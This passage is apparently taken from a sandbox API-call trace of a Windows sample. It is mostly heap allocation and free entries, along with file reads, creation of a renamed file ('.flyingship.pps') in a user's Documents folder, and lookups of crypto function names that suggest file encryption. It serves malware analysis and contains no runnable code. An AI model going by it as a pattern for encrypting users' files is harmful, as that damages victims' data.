dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0173.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0173.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0173.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0173.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0173.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0173.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0173.609] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml")) returned 0x10 [0173.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0173.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0173.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0173.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0173.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0173.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0173.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0173.610] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.flyingship.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\zakf0mr.flyingship.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0173.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0173.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0173.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0173.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0173.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0173.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0173.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0173.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0173.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0173.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0173.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0173.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0173.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0173.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0173.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0173.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0173.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0173.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0173.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0173.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0173.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0173.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0173.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0173.612] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0173.612] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0xa1d4, lpOverlapped=0x0) returned 1 [0173.614] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0173.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0173.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0173.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa1d4) returned 0xa7f018 [0173.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0173.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0173.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0173.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0173.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0173.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0173.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa1d4) returned 0xa891f8 [0173.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0173.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.616] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0173.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0173.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0173.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa1d4) returned 0xa7f018 [0173.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0173.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0173.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0173.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.616] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0173.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0173.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0173.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0173.616] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0173.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.616] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0173.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0173.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0173.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2698 [0173.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0173.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0173.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0173.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa1d4) returned 0xa7f018 [0173.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0173.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0173.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0173.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0173.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0173.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0173.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0173.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0173.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0173.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3d8 [0173.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0173.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0173.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0173.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0173.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0173.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa1d4) returned 0xa933d8 [0173.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0173.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0173.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0173.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0173.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0173.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0173.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0173.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0173.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0173.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0173.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0173.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0173.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0173.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0173.618] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0173.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0173.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0173.618] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0173.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0173.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0173.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0173.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0173.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0173.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0173.619] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0173.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0173.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2878 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0173.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba408 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0173.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0173.619] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0173.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0173.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0173.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0173.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0173.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0173.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0173.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0173.620] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0173.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0173.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0173.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0173.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0173.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0173.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0173.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0173.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0173.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0173.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0173.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0173.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0173.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0173.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0173.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0173.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0173.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0173.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0173.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.621] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0173.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0173.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0173.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0173.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0173.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0173.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0173.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0173.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0173.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: 